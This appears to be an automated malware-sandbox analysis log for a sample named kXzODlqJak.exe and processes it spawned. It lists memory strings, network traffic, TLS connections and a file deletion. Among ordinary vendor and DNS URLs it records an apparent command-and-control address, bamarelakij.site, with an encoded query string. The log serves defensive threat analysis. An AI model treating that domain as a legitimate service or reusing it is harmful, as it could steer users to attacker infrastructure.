Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.6
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: RescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: RescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2504789916.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0196AA96
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.e2a54c2fbad598371348.js
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2504789916.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2529776416.0000000008000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2253730305.000000000051B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bamarelakij.site/roi
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2223556230.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bamarelakij.site/roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.google/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.levonet.sk/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query%
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query%
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/download_api.php
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com.cn/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.php
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r1&FrontEnd=AFD
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2529776416.0000000008000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.000000000803B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Expose-Headers:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.0000000008163000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-control:public
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-controlpublic
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2546797096.00000000085E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2546797096.00000000085E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.reneelab.comwww.reneelab.comhttp://https://0
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50036 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50042 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50049 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50060 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50075 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50098 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50100 version: TLS 1.2
Source: C:\Users\user\Desktop\kXzODlqJak.exeFile deleted: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeJump to behavior
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_009342FB0_2_009342FB
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_009393980_2_00939398
